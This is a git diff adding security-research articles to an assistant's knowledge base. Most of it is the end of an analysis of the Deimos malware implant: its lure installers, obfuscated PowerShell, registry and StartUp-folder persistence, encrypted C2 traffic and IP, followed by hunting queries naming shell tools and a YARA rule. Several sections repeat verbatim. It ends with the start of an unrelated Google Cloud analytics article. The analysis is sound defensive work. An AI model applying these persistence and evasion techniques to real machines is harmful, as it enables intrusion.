+What we found particularly interesting is that the authors have spent time modifying the malware in an attempt to make it harder to detect, indicating that they're incentivized to maintain the malware. This is good to know as we move into the analysis phase because it means that we can make an impact on a valuable malware implant that will frustrate those using it for financial gain.
+
+## Analysis
+
+All indicators referenced in the analysis are located in the Indicators section.
+
+### The Pyramid of Pain
+
+Before we get into the analysis, let's discuss the model we used to help guide our process.
+
+In 2013, security researcher David Bianco released an analytical model called the [Pyramid of Pain](http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html). The model is intended to understand how uncovering different parts of an intrusion can impact a campaign. As you can see in the model below, identifying hash values are useful, but easily changed by an adversary whereas identifying TTPs is very difficult for an adversary to change.
+
+![Figure 7: Pyramid of Pain](/assets/images/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant/deimos-pyramid-of-pain.jpg)
+
+The goal of using the Pyramid of Pain is to understand as much about the intrusion as possible and project the impact (read: the amount of "pain") you can inflict. Throughout the analysis of the observed samples, we'll overlay them onto the Pyramid of Pain as an illustrative method to assess the potential impact.
+
+### File Hashes
+
+Once we identified that we had observed a new variant of the malware sample, we applied search queries to our dataset and identified 10 unique organizations across multiple verticals, indicating that this did not appear to be targeted. From those 10 organizations, we observed 10 different initial-installer file hashes. The dropped encoded files are also all different.
+
+So while this information is useful, it is apparent that using a file hash as a detection method would not be useful across organizations.
+
+### IP Addresses
+
+As other researchers have noted, we observed the same IP address used in the campaign. This IP address was [first associated](https://www.virustotal.com/gui/ip-address/216.230.232.134/relations) with malicious files on August 30, 2021.
+
+```
+IP 216.230.232.134
+Anycast false
+City Houston
+Region Texas
+Country United States (US)
+Location 29.7633,-95.3633
+Organization AS40156 The Optimal Link Corporation
+Postal 77052
+Timezone America/Chicago
+```
+
+_Figure 8: Information on identified IP address_
+
+This IP address has been reported to multiple abuse sites and identified independently by multiple security researchers. We initiated a successful takedown request of the IP address on September 21, 2021, which has removed the observed C2 infrastructure access to any implants.
+
+While this atomic indicator is useful for blocking on a firewall, it is trivial for an adversary to change to another IP address, so let’s try to get higher up the pyramid and make a bigger impact on the adversary.
+
+### Artifacts
+
+#### Resource Development
+
+The lure file samples we analyzed were predominantly signed by organizations in Scandinavian and Slavic-speaking countries, with two outliers from English and French-speaking countries. Multiple samples were signed with a digital certificate registered as a "Spoloènos s Ruèením Obmedzeným" (S.R.O.). An [S.R.O.](https://www.offshorecompany.com/company/slovakia-s-r-o/) is a business designation for Slovakian businesses owned by a foreign entity.
+
+The S.R.O. that we observed as owning the digital signatures (SRO #1) was formed on July 29, 2021, and the signature was observed starting on August 26, 2021. Additionally, the S.R.O. that we observed is owned by a different S.R.O. (SRO #2).
+
+## File Hashes
+
+Once we identified that we had observed a new variant of the malware sample, we applied search queries to our dataset and identified 10 unique organizations across multiple verticals, indicating that this did not appear to be targeted. From those 10 organizations, we observed 10 different initial-installer file hashes. The dropped encoded files are also all different.
+
+So while this information is useful, it is apparent that using a file hash as a detection method would not be useful across organizations.
+
+## IP Addresses
+
+As other researchers have noted, we observed the same IP address used in the campaign. This IP address was [first associated](https://www.virustotal.com/gui/ip-address/216.230.232.134/relations) with malicious files on August 30, 2021.
+
+```
+IP 216.230.232.134
+Anycast false
+City Houston
+Region Texas
+Country United States (US)
+Location 29.7633,-95.3633
+Organization AS40156 The Optimal Link Corporation
+Postal 77052
+Timezone America/Chicago
+```
+
+_Figure 8: Information on identified IP address_
+
+This IP address has been reported to multiple abuse sites and identified independently by multiple security researchers. We initiated a successful takedown request of the IP address on September 21, 2021, which has removed the observed C2 infrastructure access to any implants.
+
+While this atomic indicator is useful for blocking on a firewall, it is trivial for an adversary to change to another IP address, so let’s try to get higher up the pyramid and make a bigger impact on the adversary.
+
+### Artifacts
+
+##### Resource Development
+
+The lure file samples we analyzed were predominantly signed by organizations in Scandinavian and Slavic-speaking countries, with two outliers from English and French-speaking countries. Multiple samples were signed with a digital certificate registered as a "Spoloènos s Ruèením Obmedzeným" (S.R.O.). An [S.R.O.](https://www.offshorecompany.com/company/slovakia-s-r-o/) is a business designation for Slovakian businesses owned by a foreign entity.
+
+The S.R.O. that we observed as owning the digital signatures (SRO #1) was formed on July 29, 2021, and the signature was observed starting on August 26, 2021. Additionally, the S.R.O. that we observed is owned by a different S.R.O. (SRO #2).
+
+![Figure 9: Lure file digital signing S.R.O. (SRO #1) and owner (SRO #2)](/assets/images/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant/deimos-lure-file-digital-signing-sro1-and-owner-sro2.jpg)
+
+SRO #2 has been in business since August 19, 2014, and provides a variety of services. The owner of SRO #2 has a single-named partner located in a country in the former Eastern Bloc of Europe (Executive manager).
+
+![Figure 10: SRO #2 and SRO #1 sharing the same executive manager](/assets/images/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant/SRO_2.jpg)
+
+We are unable to state definitively if the organizations or people are intentionally involved, cutouts, or unwilling participants so we will not be naming them. This process of obtaining possibly stolen certificates aligns with other samples we analyzed. It is obvious that however these certificates were procured, the person (or persons) responsible appear well-versed with the bureaucracies and laws required in registering a foreign-owned business in Slovakia.
+
+## Initial Access
+
+We observed the most indicators in this tier. Indicators in the Artifacts tier, both host and network, are valuable to a defender because they are difficult for an adversary to change without considerable rearchitecting of the way the malware functions. This differs from atomic indicators (hashes and infrastructure) in that those elements are modular and can simply be updated. Artifacts, like cipher keys (as we'll see below), are often hard-coded into the source code prior to compilation and require significant work to adjust.
+
+The dropper creates a series of nested directories whose names are 32-characters long, alphanumeric, and lowercase. In all cases we've observed, there are six nested directories, and a single file within the final subdirectory using the same naming convention. During the initial execution, this file is loaded, deobfuscated with a 52-byte static XOR key, and then executed as a PowerShell script. We have included a hunting query in the Detection section that identifies this activity.
+
+Additionally, the .Net assembly creates a string by listing all files located at %USERPROFILE%\APPDATA\ROAMING. This is stored as the hwid value, which is a unique identifier for this machine. If the file doesn't exist yet, it is created by generating 32 random bytes and encoding them with a custom Base64 encoding.
+
+## Persistence
+
+Once executed, the PowerShell script establishes persistence of the malware generating a random quantity between 100 and 200 files in a directory named `%APPDATA%\Microsoft\<random string>`. The random string contains only lowercase and uppercase letters A-Z and the digits 0-9. It could be anywhere between 10 to 20 characters in length. This directory is the staging directory. These files contain randomly generated bytes between 50,000 bytes and 200,000 bytes. The files themselves are named `<random string>.<random string>`, where each random string follows the same convention as the directory name. Lastly, one final file is written to this directory which contains an obfuscated .Net DLL. This is the actual Deimos implant. It resembles the dummy files with similar attributes in this directory, further attempting to evade defenses.
+
+The next function script will create two registry keys that provide a Windows shell handler for the first file of random data created above. It uses the file extension of that file to associate a request to execute it with running a PowerShell command. The registry keys are created at `HKEY\_CURRENT\_USER\Software\Classes\<random string>\`, where the random string follows the same convention as mentioned above, except for all lowercase characters. The first key will further have a subkey of \Shell\Open\Command that contains the loader PowerShell script. The string value itself has mixed cases in an effort to be more difficult to search for. For example PowErShELl was used in our sample. The second key is effectively an alias that matches the file extension of the first randomly generated file above. It's value matches the lowercase value of the random string used in the first key's path.
+
+The final persistence artifact is a .LNk file that is placed in the user's StartUp directory. In this sample, it is hard-coded to be named a44f066dfa44db9fba953a982d48b.LNk. The shortcut is set to launch the first randomly generated file above and will open in a minimized window. Upon user login, the link file will tell Windows to launch the file, but it isn't executable. The registry keys above tell Windows to launch the PowerShell command configured in the first key above to execute the file. The PowerShell command contains the full path to the obfuscated .Net DLL and the XOR key to deobfuscate it. Finally, the .Net DLL assembly will be executed by PowerShell by calling the class method [Mars.Deimos]::interact(). This persistence architecture can be difficult to follow in text, so below is a visual representation of the persistence mechanism.
+
+![Figure 11: Persistence mechanism flow](/assets/images/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant/deimos-persistence-mechanism-flow.png)
+
+#### Command and Control Phase
+
+The malware provides a general-purpose implant that can perform any action at its privilege level. Namely, it can receive and execute a Windows PE file, a PowerShell script, a .Net DLL assembly, or run arbitrary PowerShell commands.
+
+There are a few command-specific permutations of payload encapsulations, but they are passed to a common method to perform the web request to the C2 server. The web request uses an HTTP POST method and sets a 10-minute timeout on establishing communication.
+
+No additional headers are set other than the default headers populated by the .Net WebRequest provider, which are: Host, Content-Length, and Connection: Keep-Alive.
+
+```
+POST / HTTP/1.1
+Host: 216.230.232.134
+Content-Length: 677
+Connection: Keep-Alive
+```
+
+_Figure 12: C2 HTTP headers_
+
+Figure 13 depicts the hex dump of the body of the client's POST request.
+
+![Figure 13: C2 HTTP body](/assets/images/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant/deimos-c2-http-body.jpg)
+
+The first bytes in white are randomly generated and prepended to the body to obfuscate patterns in network communication. There will be between 0 and 512 of these bytes. Next, shown in green, is a null byte, marking the end of random data. The next 10 bytes, shown in blue, are a “cookie” value sent in the last communication from the server. This is likely to prevent replaying captured packets to the server, as each communication is unique. There is nothing specific requiring this to be 10 bytes, but in all traffic we observed, this was the case. In the case of the initial check-in, this is not present. Finally, the remaining bytes shown in red here are the encrypted body. For the initial check-in, this is exactly 256-bytes of RSA encrypted data that includes the key that will be used in follow-on communications, and the unique hardware ID for this implant. For the remaining communications, the client uses AES-128 CBC mode for encryption. For AES encryption, this portion will always be a multiple of 16-bytes in length.
+
+The RSA public key used for the initial handshake is unique for each campaign. Using the YARA rule in [Figure 24](#yara-rules), we were able to discover a total of 65 samples of the implant. The RSA key provided a pivot to discern unique campaigns, spanning countries from the United States to Moldova. Only 12.5% of the samples included information stealing features, similar to what has been observed with the Jupyter Infostealer. The rest of the samples were the Deimos implant with no additional info stealing capabilities. This could mean that the implant is gaining in popularity as it is full-featured and can be used for initial access and persistence for any campaigns.
+
+#### Main Loop
+
+Once the check-in process is completed, the main process loop begins. The default action of the implant during the main loop is the ping action. ping sends information about the environment, including the machine name, Windows version, CPU architecture, information about if the user has administrative privileges, and a version string for the implant.
+
+If a task is scheduled for the implant, the response to the ping command will contain a status value that is set to either "file" or "command". If no task is given, the implant will sleep for 20 seconds + a random wait between 0 and 20 seconds. This is the wait time between all tasks.
+
+For "file" tasks, the implant immediately performs another request using the task_id attribute from the task definition to retrieve the file. The implant expects an "exe" file, a "ps1" file, or a "module", which is a .Net Assembly file.
+
+When an "exe" is downloaded, it will be written to a file in the `%TEMP%\<RANDOM\_NAME>.exe`, where RANDOM_NAME is a 24-character alphanumeric value with all capital letters. A new process is immediately launched by executing the file and the status is reported on the next task interval.
+
+When a "ps1" file is downloaded, the contents of the script are passed to a new PowerShell process using Standard Input.
+
+Finally, "module" files are added to a "plugin manager" and executes the "Run" method.
+
+For "command" tasks, no additional request is required. The "command" value from the response contains PowerShell code that will be executed the same as the "ps1" file type.
+
+Presumably, the difference is for quick scripts or perhaps interactive operations, the threat actor would use the "command" type. For larger scripts, the "file" type would be used.
+
+### Tools
+
+Looking at the metadata from all of the observed samples, we can see a high-confidence connection in that they were all created using a single PDF software platform.
+
+```
+Comments : This installation was built with Inno Setup.
+Company Name :
+File Description : SlimReader Setup
+File Version :
+Legal Copyright : (c) InvestTech
+Original File Name :
+Product Name : SlimReader
+Product Version : 1.4.1.2
+```
+
+_Figure 14: Malware lure file metadata_
+
+While this software seems to be legitimate, it seems to be frequently used to create lure files. We have observed 53 malware, or malware-adjacent, samples created using the SlimReader tool. Additionally, the research team at eSentire [identified](https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire) SlimReader as the tool of choice in the creation of, as reported, many hundreds of thousands of lure files.
+
+### TTPs
+
+At the very top of the pyramid, we observe a characteristic that is present in our samples as well as others reported by security researchers. In all observed cases, the malware used techniques known as [Google Sneaky Redirects](https://developers.google.com/search/docs/advanced/guidelines/sneaky-redirects) and [Search Engine Optimization (SEO) Poisoning](https://www.bankinfosecurity.com/how-seo-poisoning-used-to-deploy-malware-a-16882) to trick users into installing the malware.
+
+SEO poisoning is a technique used to put SEO keywords in a document to inflate its ranking on search engines, so malicious documents and websites are higher on web search results. Additionally, Google Sneaky Redirects is a technique used to name the initial malware installer after the Google search as a way to fool the user into clicking on the file they downloaded. As an example, if a user searches for "free resume template", and then clicks on a malicious website that appears to have that file, they will be presented with a malware installer named, in this example, free-resume-template.exe. The malware will leverage a PDF icon even though it is an executable as an attempt to trick the user into executing the PE file, which starts the PowerShell processes highlighted below in the Elastic Analyzer view.
+
+![Figure 15: Malware executing obfuscated PowerShell processes](/assets/images/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant/deimos-malware-executing-obfuscated-powershell-processes.png)
+
+Understanding the malware processes as well as how it interacts with the different elements with the Pyramid of Pain is paramount to inflicting long-term impacts to the activity group and intrusion sets.
+
+## Impact
+
+The described intrusion sets leverage multiple tactics and techniques categorized by the MITRE ATT&CK® framework. Other TTPs may exist, however, they were not observed during our analysis.
+
+### Tactics
+
+- [Resource Development](https://attack.mitre.org/tactics/TA0042)
+- [Initial Access](https://attack.mitre.org/tactics/TA0001)
+- [Execution](https://attack.mitre.org/tactics/TA0002)
+- [Persistence](https://attack.mitre.org/tactics/TA0003)
+- [Defense Evasion](https://attack.mitre.org/tactics/TA0005)
+- [Command and Control](https://attack.mitre.org/tactics/TA0011)
+
+### Techniques / Sub Techniques
+
+- [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) - [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)
+- [Develop Capabilities](https://attack.mitre.org/techniques/T1587) - [Malware](https://attack.mitre.org/techniques/T1587/001), [Code Signing Certificates](https://attack.mitre.org/techniques/T1587/002) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588) - [Malware](https://attack.mitre.org/techniques/T1588/001), [Code Signing Certificates](https://attack.mitre.org/techniques/T1588/003)
+- [Drive-by Compromise](https://attack.mitre.org/techniques/T1189/)
+- [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) - [PowerShell](https://attack.mitre.org/techniques/T1059/001)
+- [User Execution](https://attack.mitre.org/techniques/T1204) - [Malicious File](https://attack.mitre.org/techniques/T1204/002)
+- [Boot or Logon Autostart Execution](https://attack.mitre.org/techniques/T1547) - [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)
+- [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)
+- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) - [Indicator Removal from Tools](https://attack.mitre.org/techniques/T1027/005)
+- [Application Layer Protocol](https://attack.mitre.org/techniques/T1071) - [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
+
+## Detection
+
+There is an [existing detection rule](https://www.elastic.co/guide/en/security/8.0/shortcut-file-written-or-modified-for-persistence.html) that will generically identify this activity. We are also releasing two additional rules to detect these techniques. Additionally, we are providing hunting queries that can identify other intrusion sets leveraging similar techniques.
+
+### Detection Logic
+
+Elastic maintains a public repository for detection logic using the Elastic Stack and Elastic Endgame.
+
+### New Detection Rules
+
+[Suspicious Registry Modifications](https://github.com/elastic/detection-rules/issues/1488)
+
+[Abnormal File Extension in User AppData Roaming Path](https://github.com/elastic/detection-rules/issues/1489)
+
+## Hunting Queries
+
+These queries can be used in Kibana's Security -> Timelines -> New Timeline → Correlation query editor. While these queries will identify this intrusion set, they can also identify other events of note that, once investigated, could lead to other malicious activities.
+
+This query will identify the initial dropped file containing the obfuscated installer.
+
+```
+file where file.path regex """C:\\Users\\[^\\]*\\([a-z0-9]{32}\\){6}[a-z0-9]{32}"""
+```
+
+_Figure 16: Hunt query identifying initial installer_
+
+![Figure 17: Hunt query identifying initial installer using Timelines](/assets/images/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant/dashboard-deimos-hunt-query-identifying-initial-installer-using-timelines.jpg)
+
+This query will identify the unique “Hardware ID” file (`hwid`) that is created the first time the implant is run. This ID file is used to uniquely identify this installation.
+
+```
+file where file.path regex~ """.*\\APPDATA\\ROAMING\\[A-Za-z0-9_]{96,192}"""
+```
+
+_Figure 18: Hunt query identifying Hardware ID_
+
+![Figure 19: Hunt query identifying Hardware ID using Timelines](/assets/images/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant/dashboard-deimos-hunt-query-identifying-hardware-id-using-timelines.jpg)
+
+This query will identify any files with a file extension of ten or more characters in the AppData\Roaming path.
+
+```
+file where file.path : "*\\appdata\\roaming\\*" and
+length(file.extension) >= 10 and
+process.name : ("cmd.exe", "powershell.exe", "wmic.exe", "mshta.exe", "pwsh.exe", "cscript.exe", "wscript.exe", "regsvr32.exe", "RegAsm.exe", "rundll32.exe", "EQNEDT32.EXE", "WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSPUB.EXE", "MSACCESS.EXE", "iexplore.exe", "InstallUtil.exe")
+```
+
+_Figure 20: Hunt query identifying long file extensions_
+
+![Figure 21: Hunt query identifying long file extensions in Timelines](/assets/images/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant/dashboard-deimos-hunt-query-identifying-long-file-extensions-in-timelines.jpg)
+
+This query will identify a long string value containing the word "powershell" in the Registry.
+
+```
+registry where registry.data.strings : "*powershell*" and length(registry.data.strings) \>= 100
+```
+
+_Figure 22: Hunt query identifying long Registry strings_
+
+![Figure 23: Hunt query identifying long Registry strings in Timelines](/assets/images/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant/dashboard-deimos-hunt-query-identifying-long-registry-strings-in-timelines.jpg)
+
+## YARA Rules
+
+We have created a YARA rule to identify the presence of the Deimos trojan DLL file described in this post.
+
+```
+rule Windows_Trojan_Deimos_DLL {
+meta:
+author = "Elastic Security"
+creation_date = "2021-09-18"
+last_modified = "2021-09-18"
+os = "Windows"
+arch = "x86"
+category_type = "Trojan"
+family = "Deimos"
+threat_name = "Windows.Trojan.Deimos"
+description = "Detects the presence of the Deimos trojan DLL file."
+reference = ""
+reference_sample = "2c1941847f660a99bbc6de16b00e563f70d900f9dbc40c6734871993961d3d3e"
+
+strings:
+$a1 = "\\APPDATA\\ROAMING" wide fullword
+$a2 = "\{\"action\":\"ping\",\"" wide fullword
+$a3 = "Deimos" ascii fullword
+$b1 = \{ 00 57 00 58 00 59 00 5A 00 5F 00 00 17 75 00 73 00 65 00 72 00 \}
+$b2 = \{ 0C 08 16 1F 68 9D 08 17 1F 77 9D 08 18 1F 69 9D 08 19 1F 64 9D \}
+condition:
+all of ($a*) or 1 of ($b*)
+\}
+```
+
+_Figure 24: Deimos DLL YARA Rule_
+
+You can access this YARA rule [here](https://github.com/elastic/examples/tree/master/blog/climbing-the-pyramid-with-celestial-themed-malware).
+
+## Defensive Recommendations
+
+The following steps can be leveraged to improve a network's protective posture.
+
+1. Review and implement the above detection logic within your environment using technology such as Sysmon and the Elastic Endpoint or Winlogbeat.
+2. Review and ensure that you have deployed the latest Microsoft Security Updates
+3. Maintain backups of your critical systems to aid in quick recovery.
+
+## References
+
+The following research was referenced throughout the document:
+
+- [https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1](https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1)
+- [https://redcanary.com/blog/yellow-cockatoo](https://redcanary.com/blog/yellow-cockatoo)
+- [https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis](https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis)
+- [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:MSIL/Deimos.A!rfn&ThreatID=2147770772](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:MSIL/Deimos.A!rfn&ThreatID=2147770772)
+- [http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html](http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html)
+- [https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction](https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction)
+- [https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer](https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer)
+- [https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two](https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two)
+- [https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire](https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire)
+- [https://www.bankinfosecurity.com/how-seo-poisoning-used-to-deploy-malware-a-16882](https://www.bankinfosecurity.com/how-seo-poisoning-used-to-deploy-malware-a-16882)
+
+## Indicators
+
+| Indicators                                                       | Type        | Note                |
+| ---------------------------------------------------------------- | ----------- | ------------------- |
+| f268491d2f7e9ab562a239ec56c4b38d669a7bd88181efb0bd89e450c68dd421 | SHA256 hash | Lure file           |
+| af1e952b5b02ca06497e2050bd1ce8d17b9793fdb791473bdae5d994056cb21f | SHA256 hash | Malware installer   |
+| d6e1c6a30356009c62bc2aa24f49674a7f492e5a34403344bfdd248656e20a54 | SHA256 hash | .NET DLL file       |
+| 216[.]230[.]232[.]134                                            | IP address  | Command and control |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/google_cloud_for_cyber_data_analytics.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/google_cloud_for_cyber_data_analytics.md
new file mode 100644
index 0000000000000..002f47c2311ef
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/google_cloud_for_cyber_data_analytics.md
@@ -0,0 +1,654 @@
+---
+title: "Google Cloud for Cyber Data Analytics"
+slug: "google-cloud-for-cyber-data-analytics"
+date: "2023-12-14"
+subtitle: "Navigating the seas of cyber threat data with Google Cloud"
+description: "This article explains how we conduct comprehensive cyber threat data analysis using Google Cloud, from data extraction and preprocessing to trend analysis and presentation. It emphasizes the value of BigQuery, Python, and Google Sheets - showcasing how to refine and visualize data for insightful cybersecurity analysis."
+author:
+  - slug: terrance-dejesus
+  - slug: eric-forte
+image: "photo-edited-12.png"
+category:
+  - slug: security-research
+tags:
+  - google cloud
+---
+
+# Introduction
+
+In today's digital age, the sheer volume of data generated by devices and systems can be both a challenge and an opportunity for security practitioners. Analyzing a high magnitude of data to craft valuable or actionable insights on cyber attack trends requires precise tools and methodologies.
+
+Before you delve into the task of data analysis, you might find yourself asking:
+
+ - What specific questions am I aiming to answer, and do I possess the necessary data?
+ - Where is all the pertinent data located?
+ - How can I gain access to this data?
+ - Upon accessing the data, what steps are involved in understanding and organizing it?
+ - Which tools are most effective for extracting, interpreting, or visualizing the data?
+ - Should I analyze the raw data immediately or wait until it has been processed?
+ - Most crucially, what actionable insights can be derived from the data?
+
+If these questions resonate with you, you're on the right path. Welcome to the world of Google Cloud, where we'll address these queries and guide you through the process of creating a comprehensive report.
+
+Our approach will include several steps in the following order:
+
+**Exploration:** We start by thoroughly understanding the data at our disposal. This phase involves identifying potential insights we aim to uncover and verifying the availability of the required data.
+
+**Extraction:** Here, we gather the necessary data, focusing on the most relevant and current information for our analysis.
+
+**Pre-processing and transformation:** At this stage, we prepare the data for analysis. This involves normalizing (cleaning, organizing, and structuring) the data to ensure its readiness for further processing.
+
+**Trend analysis:** The majority of our threat findings and observations derive from this effort. We analyze the processed data for patterns, trends, and anomalies. Techniques such as time series analysis and aggregation are employed to understand the evolution of threats over time and to highlight significant cyber attacks across various platforms.
+
+**Reduction:** In this step, we distill the data to its most relevant elements, focusing on the most significant and insightful aspects.
+
+**Presentation:** The final step is about presenting our findings. Utilizing tools from Google Workspace, we aim to display our insights in a clear, concise, and visually-engaging manner.
+
+**Conclusion:** Reflecting on this journey, we'll discuss the importance of having the right analytical tools. We'll highlight how Google Cloud Platform (GCP) provides an ideal environment for analyzing cyber threat data, allowing us to transform raw data into meaningful insights.
+
+# Exploration: Determining available data
+
+Before diving into any sophisticated analyses, it's necessary to prepare by establishing an understanding of the data landscape we intend to study.
+
+Here's our approach:
+
+ 1. **Identifying available data:** The first step is to ascertain what data is accessible. This could include malware phenomena, endpoint anomalies, cloud signals, etc. Confirming the availability of these data types is essential.
+ 2. **Locating the data stores:** Determining the exact location of our data. Knowing where our data resides – whether in databases, data lakes, or other storage solutions – helps streamline the subsequent analysis process.
+ 3. **Accessing the data:** It’s important to ensure that we have the necessary permissions or credentials to access the datasets we need. If we don’t, attempting to identify and request access from the resource owner is necessary.
+ 4. **Understanding the data schema:** Comprehending the structure of our data is vital. Knowing the schema aids in planning the analysis process effectively.
+ 5. **Evaluating data quality:** Just like any thorough analysis, assessing the quality of the data is crucial. We check whether the data is segmented and detailed enough for a meaningful trend analysis.
+
+This phase is about ensuring that our analysis is based on solid and realistic foundations. For a report like the [Global Threat Report](http://www.elastic.co/gtr), we rely on rich and pertinent datasets such as:
+
+ - **Cloud signal data:** This includes data from global Security Information and Event Management (SIEM) alerts, especially focusing on cloud platforms like AWS, GCP, and Azure. This data is often sourced from [public detection rules](https://github.com/elastic/detection-rules).
+ - **Endpoint alert data:** Data collected from the global [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) alerts, incorporating a variety of public [endpoint behavior rules](https://github.com/elastic/protections-artifacts/tree/main/behavior).
+ - **Malware data:** This involves data from global Elastic Defend alerts, enriched with [MalwareScore](https://www.elastic.co/blog/introducing-elastic-endpoint-security) and public [YARA rules](https://github.com/elastic/protections-artifacts/tree/main/yara).
+ 
+ Each dataset is categorized and enriched for context with frameworks like [MITRE ATT&CK](https://attack.mitre.org/), Elastic Stack details, and customer insights. Storage solutions of Google Cloud Platform, such as BigQuery and Google Cloud Storage (GCS) buckets, provide a robust infrastructure for our analysis.
+
+It's also important to set a data “freshness” threshold, excluding data not older than 365 days for an annual report, to ensure relevance and accuracy.
+
+Lastly, remember to choose data that offers an unbiased perspective. Excluding or including internal data should be an intentional, strategic decision based on its relevance to your visibility.
+
+In summary, selecting the right tools and datasets is fundamental to creating a comprehensive and insightful analysis. Each choice contributes uniquely to the overall effectiveness of the data analysis, ensuring that the final insights are both valuable and impactful.
+
+# Extraction: The first step in data analysis
+
+Having identified and located the necessary data, the next step in our analytical journey is to extract this data from our storage solutions. This phase is critical, as it sets the stage for the in-depth analysis that follows.
+
+## Data extraction tools and techniques
+
+Various tools and programming languages can be utilized for data extraction, including Python, R, Go, Jupyter Notebooks, and Looker Studio. Each tool offers unique advantages, and the choice depends on the specific needs of your analysis.
+
+In our data extraction efforts, we have found the most success from a combination of [BigQuery](https://cloud.google.com/bigquery?hl=en), [Colab Notebooks](https://colab.google/), [buckets](https://cloud.google.com/storage/docs/json_api/v1/buckets), and [Google Workspace](https://workspace.google.com/) to extract the required data. Colab Notebooks, akin to Jupyter Notebooks, operate within Google's cloud environment, providing a seamless integration with other Google Cloud services.
+
+## BigQuery for data staging and querying
+
+In the analysis process, a key step is to "stage" our datasets using BigQuery. This involves utilizing BigQuery queries to create and save objects, thereby making them reusable and shareable across our team. We achieve this by employing the [CREATE TABLE](https://hevodata.com/learn/google-bigquery-create-table/#b2) statement, which allows us to combine multiple [datasets](https://cloud.google.com/bigquery/docs/datasets-intro) such as endpoint behavior alerts, customer data, and rule data into a single, comprehensive dataset.
+
+This consolidated dataset is then stored in a BigQuery table specifically designated for this purpose–for this example, we’ll refer to it as the “Global Threat Report” dataset. This approach is applied consistently across different types of data, including both cloud signals and malware datasets.
+
+The newly created data table, for instance, might be named `elastic.global_threat_report.ep_behavior_raw`. This naming convention, defined by BigQuery, helps in organizing and locating the datasets effectively, which is crucial for the subsequent stages of the extraction process.
+
+An example of a BigQuery query used in this process might look like this:
+
+```
+CREATE TABLE elastic.global_threat_report.ep_behavior_raw AS
+SELECT * FROM ...
+```
+
+![Diagram for BigQuery query to an exported dataset table](/assets/images/google-cloud-for-cyber-data-analytics/image8.png)
+Diagram for BigQuery query to an exported dataset table
+
+We also use the [EXPORT DATA](https://cloud.google.com/bigquery/docs/reference/standard-sql/other-statements#export_data_statement) statement in BigQuery to transfer tables to other GCP services, like exporting them to Google Cloud Storage (GCS) buckets in [parquet file format](https://parquet.apache.org/).
+
+```
+EXPORT DATA
+  OPTIONS (
+    uri = 'gs://**/ep_behavior/*.parquet',
+    format = 'parquet',
+    overwrite = true
+  )
+AS (
+SELECT * FROM `project.global_threat_report.2023_pre_norm_ep_behavior`
+)
+```
+
+## Colab Notebooks for loading staged datasets
+
+[Colab Notebooks](https://colab.research.google.com/) are instrumental in organizing our data extraction process. They allow for easy access and management of data scripts stored in platforms like GitHub and Google Drive.
+
+For authentication and authorization, we use Google Workspace credentials, simplifying access to various Google Cloud services, including BigQuery and Colab Notebooks. Here's a basic example of how authentication is handled:
+
+![Diagram for authentication and authorization between Google Cloud services](/assets/images/google-cloud-for-cyber-data-analytics/image9.png)
+Diagram for authentication and authorization between Google Cloud services
+
+For those new to [Jupyter Notebooks](https://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/) or dataframes, it's beneficial to spend time becoming familiar with these tools. They are fundamental in any data analyst's toolkit, allowing for efficient code management, data analysis, and structuring. Mastery of these tools is key to effective data analysis.
+
+Upon creating a notebook in Google Colab, we're ready to extract our custom tables (such as project.global_threat_report.ep_behavior_raw) from BigQuery. This data is then loaded into Pandas Dataframes, a Python library that facilitates data manipulation and analysis. While handling large datasets with Python can be challenging, Google Colab provides robust virtual computing resources. If needed, these resources can be scaled up through the Google Cloud [Marketplace](https://console.cloud.google.com/marketplace/product/colab-marketplace-image-public/colab) or the Google Cloud Console, ensuring that even large datasets can be processed efficiently.
+
+## Essential Python libraries for data analysis
+
+In our data analysis process, we utilize various Python libraries, each serving a specific purpose:
+
+| Library | Description |
+|-----------|---------------|
